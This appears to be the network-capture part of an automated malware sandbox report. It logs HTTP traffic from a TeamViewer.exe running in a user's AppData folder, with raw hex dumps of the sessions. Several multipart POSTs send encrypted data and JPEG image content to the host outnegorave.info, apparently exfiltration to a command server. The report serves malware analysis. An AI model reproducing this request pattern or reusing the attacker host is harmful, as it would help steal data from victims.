                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 37 38
                                                                                                                      Data Ascii: $32172978
                                                                                                                      Sep 15, 2021 14:08:01.287225962 CEST932OUTGET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.309426069 CEST933INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.314114094 CEST933OUTGET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.335100889 CEST934INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 443
                                                                                                                      Data Raw: 17 24 13 b6 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 9d 1c 18 2f 99 99 9b 1c 1c af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 98 af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 af 98 2f 99 9c 98 98 1b 99 19 1b 1b af 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 96 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 9b 16 18 9c 1c 17 18 9b 99 17 18 9c 99 17 18 98 18 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 1b 16 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 9a 96 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 19 1a 1b 17 18 9c 19 96 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9a 16 18 9c 1c 17 1b 1a 97 1b 9b 17 18 99 9c 16 18 9a 9c 97 1c 17 1c 1c 17 18 99 9c 16 18 9c 1c 17 18 9b 99 17 19 19 99 97 18 9b 9a 96 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9b 1a 16 19 9b 97 19 1a 99 17 19 1a 1b 17 18 98 19 16 19 18 9b 97 18 9a 1b 17 19 18 97 18 9a 18 16 1c 9a 17 18 9b 17 1b 17 18 9b 9a 96 18 9c 1c 17 18 9b 99 17 19 19 19 97 18 98 9b 96 19 18 99 97 19 19 1b 97 18 9c 1a 97 18 99 9c 96 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 9c 16 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 99 af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                                      Data Ascii: $ '////////13&6!


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      7192.168.2.64975637.252.232.10980C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.395808935 CEST934OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.435075998 CEST934INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 17
                                                                                                                      Data Raw: 17 24 66 61 73 74 31 32 38 35 32 34 30 38
                                                                                                                      Data Ascii: $fast12852408
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST936OUTPOST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Content-Length: 500000
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      8192.168.2.64975737.252.232.10980C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.495162010 CEST935OUTPOST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Content-Length: 3
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST936INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST937OUTGET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST937INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 500000
                                                                                                                      Data Raw: 17 24 11 04 00 94 03 ef 2e
                                                                                                                      Data Ascii: $.


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649758172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:08:03 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 87812
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2771230636
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2771230636Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 79 0b 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^y;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:08:03 UTC16OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 40 ab 5a 7d b2 5c ce c9 21 60 02 e7 e5 fa 8a 23 17 27 64 12 92 8a bb 2a 8a 5a d9 fe c8 b7 fe fc bf 98 ff 00 0a 3f b2 6d ff 00 bf 2f e6 3f c2 b6 fa ad 43 0f ad 53 31 a8 ad af ec 9b 7f ef cb f9 8f f0 a3 fb 26 df fb f2 fe 63 fc 29 fd 5a a0 7d 6a 99 8b 46 2b 67 fb 26 df fb f2 fe 63 fc 2a b5 fd 8c 56 d0 2b c6 ce 49 6c 7c c4 7a 1a 99 61 e7 15 76 54 71 10 93 b2 33 b1 46 29 68 35 81 b8 da 29 68 a0 04 a2 96 8c 52 b0 09 45 2e 29 31 45 86 14 51 8a 28 b0 05 14 51 40 05 2d 25 68 e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4
                                                                                                                      Data Ascii: EPQQEGK@Z}\!`#'d*Z?m/?CS1&c)Z}jF+g&c*V+Il|zavTq3F)h5)hRE.)1EQ(Q@-%hBo:#mbpz\D<C@O*hq{P1C_ZIc[zR
                                                                                                                      2021-09-15 12:08:03 UTC32OUTData Raw: da 0a 28 a2 80 0a 28 a5 44 79 1c 24 6a cc c7 a0 51 92 69 80 94 53 a4 8e 48 9f 64 a8 c8 c3 b3 0c 1a 6d 00 14 51 45 20 0a 28 a2 80 0a 28 a2 98 05 14 51 40 05 14 51 40 05 2d 25 28 a0 02 8a 28 a0 41 4b 49 4b 4c 02 96 92 94 50 02 d2 8a 05 2d 52 44 b6 2e 28 c5 2d 14 ec 48 d3 4d a7 1a 43 49 94 84 a2 8a 29 00 51 45 14 00 b4 b4 94 53 01 68 a2 92 81 0b de 96 92 96 80 0a 28 a2 98 0b 45 25 14 00 51 45 14 c0 51 4b 49 4b 40 82 8a 28 a0 05 a2 8a 29 88 29 68 a2 98 85 a5 14 94 b4 c4 2d 14 94 50 03 85 2d 34 52 d3 24 5a 5a 4a 5a 60 28 a5 cd 36 96 9a 13 1d 4b 4d 14 a2 a9 12 c7 52 d3 69 69 88 75 14 94 53 10 e0 69 c0 d3 29 45 3b 89 a1 d4 b4 da 75 34 48 a2 96 93 34 53 10 ea 75 33 34 a0 d3 42 68 75 19 a4 cd 14 c4 38 1a 76 69 94 b5 49 89 a1 f9 a2 9b 4b 9a 77 26 c3 c1 a5 cd 32 96
                                                                                                                      Data Ascii: ((Dy$jQiSHdmQE ((Q@Q@-%((AKIKLP-RD.(-HMCI)QESh(E%QEQKIK@())h-P-4R$ZZJZ`(6KMRiiuSi)E;u4H4Su34Bhu8viIKw&2
                                                                                                                      2021-09-15 12:08:03 UTC48OUTData Raw: 1f e0 44 62 bf 88 c4 cd 2d 25 1f 4a dc e6 17 34 52 52 f3 40 21 41 a7 0a 6e 29 c2 a4 b4 2d 38 53 29 e2 93 29 0b 45 14 52 29 0e 14 e1 4d 1c 53 80 a9 65 a1 c2 9c 29 00 a7 62 a5 9a 21 69 69 31 4a 05 26 52 1c 29 c2 9a 05 38 54 32 90 e1 4e cd 30 53 c5 26 5a 14 53 a9 a2 9d 52 ca 43 85 70 de 34 00 5c 5b 63 fb ad fc eb b8 1d eb 86 f1 a7 fc 7c db ff 00 b8 df ce aa 96 e2 99 c2 52 6d 06 9d 8a 2b 1b 1d 77 1b b1 68 d8 be 94 ea 28 b2 0b b1 62 2d 0c a9 2c 2e f1 c8 87 72 ba 1c 15 3e a0 8a 59 19 e6 95 e5 9e 47 96 47 39 67 76 24 b1 f5 24 f5 a4 a2 8b 20 bb 1a 23 51 da 94 22 fa 52 d2 d3 b2 15 d8 52 d2 52 d3 10 d2 8a dc 91 41 8d 48 c6 29 d4 51 64 17 63 3c a5 f4 a5 d8 be 94 fa 4a 39 50 5d 8d f2 d7 39 c5 01 14 74 14 ea 28 b2 0b b1 02 80 30 3a 52 04 50 72 29 d4 51 60 b8 b4 dd a3
                                                                                                                      Data Ascii: Db-%J4RR@!An)-8S))ER)MSe)b!ii1J&R)8T2N0S&ZSRCp4\[c|Rm+wh(b-,.r>YGG9gv$$ #Q"RRRAH)Qdc<J9P]9t(0:RPr)Q`
                                                                                                                      2021-09-15 12:08:03 UTC64OUTData Raw: 45 31 0b 45 14 50 21 68 cd 20 a5 a6 02 d1 49 4b 40 0b 45 25 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a
                                                                                                                      Data Ascii: E1EP!h IK@E%-1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&
                                                                                                                      2021-09-15 12:08:03 UTC80OUTData Raw: 69 e4 1c 87 ce f8 a5 af a1 fe cf 07 fc f1 8f fe f9 14 7d 9e 0f f9 e3 1f fd f2 28 f6 9e 41 c8 7c ef 45 7d 11 f6 78 3f e7 8c 7f f7 c8 a3 ec f0 7f cf 18 ff 00 ef 91 47 38 72 1f 3b d1 5f 44 7d 9e 0f f9 e3 1f fd f2 28 fb 3c 1f f3 c6 3f fb e4 51 ce 1c 87 cf 14 95 f4 47 d9 e0 ff 00 9e 31 ff 00 df 22 8f b3 c1 ff 00 3c 63 ff 00 be 45 1e d0 39 0f 9d f1 46 2b e8 8f 22 1f f9 e3 1f fd f2 28 f2 21 ff 00 9e 31 ff 00 df 22 8f 69 e4 1c 87 ce f8 a3 15 f4 47 91 0f fc f1 8f fe f9 14 79 10 ff 00 cf 18 ff 00 ef 91 47 b4 f2 0e 43 e7 7c 52 e2 be 87 f2 21 ff 00 9e 31 ff 00 df 22 be 75 a6 a6 1c a3 f1 46 29 94 51 ce 2e 51 f8 a2 99 45 1c e1 ca 48 29 6a 2a 29 f3 87 21 2d 15 15 14 7b 41 72 12 d1 51 51 47 b4 0e 42 5a 2a 2a 28 f6 81 c8 4d 45 43 45 1e d0 39 09 a8 a8 68 a3 da 07 21 35 15
                                                                                                                      Data Ascii: i}(A|E}x?G8r;_D}(<?QG1"<cE9F+"(!1"iGyGC|R!1"uF)Q.QEH)j*)!-{ArQQGBZ**(MECE9h!5
                                                                                                                      2021-09-15 12:08:03 UTC85OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2771230636--
                                                                                                                      2021-09-15 12:08:04 UTC85INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:08:04 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=ddccde455271131aa0b714df2720e21d55a3a6bfbd1d37b175bcd503cf90f9d2; expires=Thu, 15-Sep-2022 12:08:03 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Uk4xUJSb82XHn%2BPd%2F2ObLeDWOCSDzYadeWCDROZejiDEgioYH3EqGxaJu8nj7SulPtttBGoqnBjd3bO0OvJZ736Z1BhiKzS3hPTQfhQGOWcZpDpJwKD5KFx4J1VzEbygQta"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1bcfe6d7f4ec1-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:08:04 UTC86INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649834172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:09:06 UTC86OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 90555
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2341619378
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 34 31 36 31 39 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2341619378Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 36 3e 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^6>;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:09:06 UTC103OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 5a ee 90 21 0a 2d a2 3f 2a 9c 90 7b 80 7d 69 f6 f1 5b cb 21 56 b6 88 00 33 c6 7f c6 94 62 e4 ec 82 52 51 57 66 28 a5 ae 8b ec 76 bf f3 ee 9f ad 1f 63 b5 ff 00 9f 74 fd 6b 7f ab 54 30 fa d5 33 9d a2 ba 2f b1 da ff 00 cf ba 7e b4 7d 8e d7 fe 7d d3 f5 a3 ea d5 03 eb 54 ce 76 8c 57 45 f6 3b 5f f9 f7 4f d6 a2 b8 b7 b6 8a 30 cb 6d 19 39 c7 39 ff 00 1a 52 a1 38 ab b2 a3 88 84 9d 91 83 8a 31 5a d8 87 fe 7d a1 fc 8f f8 d5 1b e4 58 ef 25 44 00 2a b6 00 15 81 bd ca d4 52 d1 40 09 45 2d 18 a5 60 12 8a 5c 52 62 8b 0c 28 a3 14 51 60 0a 28 a2 80 0a 5a 4a d1 d3 b4 3d 53 54 85 a5 d3 ec de 74 46 da c5 48 e0 f5 f5 a1 bb 6e 16 b9 9f 49 5b 9f f0 88 78 87 fe 81 53 fe 9f e3 47 fc 22 1e 21 ff 00 a0 54 ff 00 a7 f8 d1 cd 1e e3 e5 7d 8c
                                                                                                                      Data Ascii: EPQQEGKZ!-?*{}i[!V3bRQWf(vctkT03/~}}TvWE;_O0m99R81Z}X%D*R@E-`\Rb(Q`(ZJ=STtFHnI[xSG"!T}
                                                                                                                      2021-09-15 12:09:06 UTC119OUTData Raw: 8a ce 15 7e c8 f2 2b 1a ab dd 36 c3 bf 7c eb 54 e3 4d 27 fd 9a f3 eb bf f5 8d f5 ae f7 38 d2 58 ff 00 b3 5c 05 d1 fd e3 7d 6b 97 01 bc 8f 4f 30 7f 01 d4 5b 7f c8 ab 1f f9 ef 59 0f 5a d0 1f f8 a5 22 ff 00 3d eb 19 d8 e6 aa 82 d6 5e a6 18 c7 a4 7d 06 31 23 a1 a0 3b 0e 8c 69 33 9a 4a eb b1 e6 73 32 41 3b 8e f9 a7 79 e0 fd e4 06 a1 a2 97 2a 29 4d a2 53 e4 37 de 4c 52 1b 68 1b a1 c5 47 45 16 7d 18 d5 57 d4 1b 4f 53 f7 58 54 4d a7 c8 3a 73 53 64 f5 06 a4 59 1c 7f 11 a2 f2 45 a9 a3 3d ad 65 5e aa 6a 33 1b 0e a0 d6 c0 95 bb 81 4e dc 87 ef 20 34 fd a3 5d 0d 16 bd 4c 32 08 ec 69 2b 6c c3 6e fd 57 14 c3 61 0b 7d d6 c5 3f 6a 87 66 63 d1 5a 6d a5 9f e1 60 6a 17 d3 e6 5e 8b 9a 6a a4 7b 85 99 4e 8a 99 ad a5 5e a8 7f 2a 88 a3 0e a0 d5 a6 98 84 a2 8c 51 4c 02 96 92 8a 04
                                                                                                                      Data Ascii: ~+6|TM'8X\}kO0[YZ"=^}1#;i3Js2A;y*)MS7LRhGE}WOSXTM:sSdYE=e^j3N 4]L2i+lnWa}?jfcZm`j^j{N^*QL
                                                                                                                      2021-09-15 12:09:06 UTC135OUTData Raw: ff 00 70 d4 0d f7 8f d6 a6 d2 bf e3 e1 bf dc 35 09 fb c7 eb 59 af 8d 84 fe 14 25 2d 25 28 ad 0c 85 a5 a4 a5 a4 20 a5 a4 a5 a4 20 a2 8a 28 10 52 d2 52 d2 00 a2 8a 5a 00 4a 5c 52 d1 40 84 a5 a2 96 90 5c 00 ab 76 31 e6 50 7d ea ba 29 6a d2 d3 e3 fd ea 8f 7a c6 ac ad 16 74 61 a1 cd 34 49 e3 15 ff 00 45 b6 f6 15 c8 db 2f fa 64 3f ef af f3 ae d3 c6 09 fe 89 09 f4 ae 3a d4 7f a6 c3 fe fa ff 00 3a cb 0c ff 00 70 7a 35 f4 af 63 b6 d7 3f e3 e2 3f f7 2b 28 9a d5 d7 3f e3 e5 3f dc ac a3 59 e1 fe 04 46 2b f8 8c 4c d2 d2 51 f4 ad ce 61 73 45 25 2f 34 02 14 1a 70 a6 e2 9c 2a 4b 42 d3 85 32 9e 29 32 90 b4 51 45 22 90 e1 4e 14 d1 c5 38 0a 96 5a 1c 29 c2 90 0a 76 2a 59 a2 16 96 93 14 a0 52 65 21 c2 9c 29 a0 53 85 43 29 0e 14 ec d3 05 3c 52 65 a1 45 3a 9a 29 d5 2c a4 38 57
                                                                                                                      Data Ascii: p5Y%-%( (RRZJ\R@\v1P})jzta4IE/d?::pz5c??+(??YF+LQasE%/4p*KB2)2QE"N8Z)v*YRe!)SC)<ReE:),8W
